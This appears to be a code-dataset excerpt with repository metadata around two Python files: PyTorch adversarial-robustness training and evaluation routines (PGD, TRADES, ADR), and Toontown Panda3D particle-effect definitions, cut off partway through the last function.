| 42.444444
| 0.775031
| 0
| 0
| 0.710526
| 0
| 0
| 0.021466
| 0
| 0
| 0
| 0
| 0
| 0.236842
| 1
| 0.078947
| false
| 0
| 0.052632
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fae228b8f3ad47814aa7fe198d54e0967acca04
| 11,487
|
py
|
Python
|
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | 13
|
2020-12-17T11:44:41.000Z
|
2021-08-20T02:22:02.000Z
|
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | null | null | null |
ADR_pt/mytrain.py
|
tuananhbui89/Adversarial-Divergence-Reduction
|
7304fa514b6c044aa19afce87c3794f9619e9665
|
[
"Apache-1.1"
] | 1
|
2020-12-17T11:45:39.000Z
|
2020-12-17T11:45:39.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, TensorDataset
from torch.autograd import Variable
import torch.optim as optim
from functools import partial
from trades import trades_loss
from pgd import pgd_loss, pgd_attack, pgd_attack_l2
from adr import adr_pgd, adr_trades
from utils import count_pred
def get_diff(X, X_adv, order, epsilon=None):
X = torch.reshape(X, [X.shape[0], -1])
X_adv = torch.reshape(X_adv, [X_adv.shape[0], -1])
d = torch.norm(X_adv - X, p=order, dim=-1, keepdim=True) # [b,]
if epsilon is not None:
delta = torch.abs(X_adv - X)
num_exceed = torch.sum(delta > epsilon, dim=1)/X.shape[1]
num_exceed = torch.mean(num_exceed)
d = torch.mean(d) # []
return d, num_exceed
else:
d = torch.mean(d) # []
return d
def train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
model.train()
num_batches = len(data_loader.dataset) // 128
for batch_idx, (data, target) in enumerate(data_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.cross_entropy(output, target, reduction='none')
loss = torch.mean(loss)
loss.backward()
optimizer.step()
nat_acc = get_acc(output, target)
if batch_idx % log_interval == 0:
writestr = [
('Train_iter={}', epoch*num_batches + batch_idx),
('loss={:.4f}', loss.item()),
('nat_acc={:.4f}', nat_acc.item()),
]
writestr = ' ,'.join([t.format(v) for (t, v) in writestr])
print(writestr)
writer.add_scalar('loss', loss.item(), epoch*num_batches + batch_idx)
writer.add_scalar('nat_acc', nat_acc.item(), epoch*num_batches + batch_idx)
return writer
def baseline_train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
model.train()
if attack_params['defense'] == 'pgd_train':
defense = pgd_loss
elif attack_params['defense'] == 'trades_train':
defense = trades_loss
else:
raise ValueError
num_batches = len(data_loader.dataset) // 128
for batch_idx, (data, target) in enumerate(data_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
loss, X_adv = defense(model=model,
x_natural=data,
y=target,
device=device,
optimizer=optimizer,
step_size=attack_params['step_size'],
epsilon=attack_params['epsilon'],
perturb_steps=attack_params['num_steps'],
beta=attack_params['trades_beta'],
projecting=attack_params['projecting'],
x_min=attack_params['x_min'],
x_max=attack_params['x_max'])
loss.backward()
optimizer.step()
nat_output = model(data)
adv_output = model(X_adv)
nat_acc = get_acc(nat_output, target)
adv_acc = get_acc(adv_output, target)
if batch_idx % log_interval == 0:
writestr = [
('Train_iter={}', epoch*num_batches + batch_idx),
('nat_acc={:.4f}', nat_acc.item()),
('adv_acc={:.4f}', adv_acc.item()),
('loss={:.4f}', loss.item()),
]
writestr = ' ,'.join([t.format(v) for (t, v) in writestr])
print(writestr)
writer.add_scalar('nat_acc', nat_acc.item(), epoch*num_batches + batch_idx)
writer.add_scalar('adv_acc', adv_acc.item(), epoch*num_batches + batch_idx)
writer.add_scalar('loss', loss.item(), epoch*num_batches + batch_idx)
return writer
def adr_train(model, data_loader, epoch, optimizer, device, log_interval, attack_params, writer):
model.train()
if attack_params['defense'] == 'adr_pgd':
defense = adr_pgd
elif attack_params['defense'] == 'adr_trades':
defense = adr_trades
else:
raise ValueError
num_batches = len(data_loader.dataset) // 128
for batch_idx, (data, target) in enumerate(data_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
loss, X_adv = defense(model=model,
x_natural=data,
y=target,
device=device,
optimizer=optimizer,
step_size=attack_params['step_size'],
epsilon=attack_params['epsilon'],
perturb_steps=attack_params['num_steps'],
beta=attack_params['trades_beta'],
projecting=attack_params['projecting'],
x_min=attack_params['x_min'],
x_max=attack_params['x_max'],
lccomw=attack_params['lccomw'],
lcsmtw=attack_params['lcsmtw'],
gbcomw=attack_params['gbcomw'],
gbsmtw=attack_params['gbsmtw'],
confw=attack_params['confw'])
loss.backward()
optimizer.step()
nat_output = model(data)
adv_output = model(X_adv)
nat_acc = get_acc(nat_output, target)
adv_acc = get_acc(adv_output, target)
if batch_idx % log_interval == 0:
writestr = [
('Train_iter={}', epoch*num_batches + batch_idx),
('nat_acc={:.4f}', nat_acc.item()),
('adv_acc={:.4f}', adv_acc.item()),
('loss={:.4f}', loss.item()),
]
writestr = ' ,'.join([t.format(v) for (t, v) in writestr])
print(writestr)
writer.add_scalar('nat_acc', nat_acc.item(), epoch*num_batches + batch_idx)
writer.add_scalar('adv_acc', adv_acc.item(), epoch*num_batches + batch_idx)
writer.add_scalar('loss', loss.item(), epoch*num_batches + batch_idx)
return writer
def test(model, data_loader, device, return_count=False, num_classes=10):
model.eval()
test_loss = 0
correct = 0
pred_as_count = np.zeros(shape=[num_classes,])
correct_count = np.zeros(shape=[num_classes,])
class_count = np.zeros(shape=[num_classes,])
with torch.no_grad():
for data, target in data_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
p, c = count_pred(labels=target, preds=output, num_classes=num_classes)
pred_as_count += p
correct_count += c
class_count += count_pred(labels=target, preds=target, num_classes=num_classes)[0]
test_loss /= len(data_loader.dataset)
accuracy = correct / len(data_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(data_loader.dataset),
100. * correct / len(data_loader.dataset)))
print('pred_as_count: ', pred_as_count)
print('correct_count: ', correct_count)
if return_count:
return accuracy, pred_as_count, correct_count, class_count
else:
return accuracy
def adv_test(model, data_loader, device, attack_params, return_count=False, num_classes=10):
model.eval()
test_loss = 0
correct = 0
pred_as_count = np.zeros(shape=[num_classes,])
correct_count = np.zeros(shape=[num_classes,])
class_count = np.zeros(shape=[num_classes,])
with torch.no_grad():
for data, target in data_loader:
data, target = data.to(device), target.to(device)
X_adv, _ = pgd_attack(model, data, target, device, attack_params, status='eval')
X_adv = Variable(X_adv.data, requires_grad=False)
output = model(X_adv)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
p, c = count_pred(labels=target, preds=output, num_classes=num_classes)
pred_as_count += p
correct_count += c
class_count += count_pred(labels=target, preds=target, num_classes=num_classes)[0]
test_loss /= len(data_loader.dataset)
accuracy = correct / len(data_loader.dataset)
print('\nRobustness evaluation : Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(data_loader.dataset),
100. * correct / len(data_loader.dataset)))
if return_count:
return accuracy, pred_as_count, correct_count, class_count
else:
return accuracy
def adv_test_l2(model, data_loader, device, attack_params, return_count=False, num_classes=10):
model.eval()
test_loss = 0
correct = 0
pred_as_count = np.zeros(shape=[num_classes,])
correct_count = np.zeros(shape=[num_classes,])
class_count = np.zeros(shape=[num_classes,])
with torch.no_grad():
for data, target in data_loader:
data, target = data.to(device), target.to(device)
X_adv, _ = pgd_attack_l2(model, data, target, device, attack_params, status='eval')
X_adv = Variable(X_adv.data, requires_grad=False)
output = model(X_adv)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
p, c = count_pred(labels=target, preds=output)
pred_as_count += p
correct_count += c
class_count += count_pred(labels=target, preds=target)[0]
test_loss /= len(data_loader.dataset)
accuracy = correct / len(data_loader.dataset)
print('\nRobustness evaluation : Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(data_loader.dataset),
100. * correct / len(data_loader.dataset)))
if return_count:
return accuracy, pred_as_count, correct_count, class_count
else:
return accuracy
def get_pred(model, data_loader, device):
model.eval()
result = []
with torch.no_grad():
for data in data_loader:
data = data.to(device)
output = model(data)
output = torch.nn.Softmax()(output)
result.append(output.cpu().numpy())
result = np.concatenate(result, axis=0)
return result
def get_acc(output, target):
pred = output.argmax(dim=1, keepdim=True)
acc = torch.mean(pred.eq(target.view_as(pred)).type(torch.FloatTensor))
return acc
| 38.676768
| 103
| 0.586663
| 1,419
| 11,487
| 4.524313
| 0.110641
| 0.056075
| 0.030374
| 0.046729
| 0.817601
| 0.803427
| 0.788006
| 0.777259
| 0.777259
| 0.774922
| 0
| 0.00798
| 0.290938
| 11,487
| 296
| 104
| 38.807432
| 0.780233
| 0.016279
| 0
| 0.721992
| 0
| 0
| 0.059079
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037344
| false
| 0
| 0.049793
| 0
| 0.141079
| 0.033195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fb5f84ba9d0fb43bdb320c5a8b2fe7670f7120d
| 195,239
|
py
|
Python
|
toontown/battle/ParticleDefs.py
|
LittleNed/toontown-stride
|
1252a8f9a8816c1810106006d09c8bdfe6ad1e57
|
[
"Apache-2.0"
] | 1
|
2018-06-16T23:06:38.000Z
|
2018-06-16T23:06:38.000Z
|
toontown/battle/ParticleDefs.py
|
NoraTT/Historical-Commits-Project-Altis-Source
|
fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179
|
[
"Apache-2.0"
] | null | null | null |
toontown/battle/ParticleDefs.py
|
NoraTT/Historical-Commits-Project-Altis-Source
|
fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179
|
[
"Apache-2.0"
] | 4
|
2019-06-20T23:45:23.000Z
|
2020-10-14T20:30:15.000Z
|
from direct.particles import Particles, ForceGroup
from pandac.PandaModules import *
ParticleTable = {}
def particle(func):
ParticleTable[func.func_name] = func
@particle
def gearExplosion(self):
self.reset()
self.setPos(0.000, 0.000, 4.600)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.1000)
p0.setLitterSize(40)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.1600)
p0.renderer.setFinalXScale(0.160)
p0.renderer.setInitialYScale(0.1600)
p0.renderer.setFinalYScale(0.160)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(9.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(3.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def smokeTest4(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(30)
p0.setBirthRate(0.1000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(2.0000)
p0.factory.setLifespanSpread(0.5000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
p0.renderer.setUserAlpha(0.57)
# Sprite parameters
p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_ext_smoke.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(2.0000)
p0.renderer.setFinalXScale(4.0000)
p0.renderer.setInitialYScale(2.0000)
p0.renderer.setFinalYScale(4.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
p0.renderer.getColorInterpolationManager().addLinear(0.0,1.0,Vec4(0.28235295414924622,0.28235295414924622,0.28235295414924622,1.0),Vec4(0.28235295414924622,0.28235295414924622,0.28235295414924622,1.0),1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(0.4000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 6.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
@particle
def gearExplosionSmall(self):
self.reset()
self.setPos(0.000, 0.000, 4.600)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(6)
p0.setBirthRate(0.4000)
p0.setLitterSize(2)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.112)
p0.renderer.setFinalXScale(0.112)
p0.renderer.setInitialYScale(0.112)
p0.renderer.setFinalYScale(0.112)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(9.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(3.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def gearExplosionBig(self):
self.reset()
self.setPos(0.000, 0.000, 4.600)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.1000)
p0.setLitterSize(40)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.1600)
p0.renderer.setFinalXScale(0.160)
p0.renderer.setInitialYScale(0.1600)
p0.renderer.setFinalYScale(0.160)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(15.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 18.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(1.6282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def poundkey(self):
self.reset()
self.setPos(-0.500, 1.000, 3.100)
self.setHpr(-180.000, -0.000, 180.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.20)
p0.setLitterSize(3)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.5000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(20.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/poundsign")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0000)
p0.renderer.setFinalXScale(0.600)
p0.renderer.setInitialYScale(0.0000)
p0.renderer.setFinalYScale(0.600)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(10.0000)
p0.emitter.setAmplitudeSpread(3.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 100.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
force0 = LinearJitterForce(4.5449, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def shred(self):
self.reset()
self.setPos(0.000, 3.000, 2.300)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.0600)
p0.setLitterSize(3)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.9000)
p0.factory.setLifespanSpread(0.4000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.2000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0160)
p0.renderer.setFinalXScale(0.0240)
p0.renderer.setInitialYScale(0.3200)
p0.renderer.setFinalYScale(0.0800)
p0.renderer.setNonanimatedTheta(5.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(1.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 3.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -7.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.6000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 5.0000), 1.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearSinkForce(Point3(0.0000, 0.0000, -8.0000), LinearDistanceForce.FTONEOVERRSQUARED, 14.5479, 155.9407, 1)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearNoiseForce(1.7000, 0)
force2.setActive(1)
f0.addForce(force2)
force3 = LinearJitterForce(12.5698, 0)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def withdrawal(self):
self.reset()
self.setPos(0.000, 10.000, 2.500)
self.setHpr(-180.000, 0.000, 0.000)
self.setScale(4.000, 4.000, 4.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.4000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAIN)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.04)
p0.renderer.setFinalXScale(0.3125)
p0.renderer.setInitialYScale(0.03)
p0.renderer.setFinalYScale(0.25)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Line parameters
#p0.renderer.setHeadColor(Vec4(1.00, 0.00, 0.00, 1.00))
#p0.renderer.setTailColor(Vec4(1.00, 0.00, 0.00, 1.00))
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-0.4000)
p0.emitter.setAmplitudeSpread(0.1000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 1.5000, 0.0000))
# Disc parameters
p0.emitter.setRadius(1.7000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 1.0000, 0.0000), 1.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def mumboJumboSmother(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(4)
p0.setBirthRate(0.1100)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0300)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
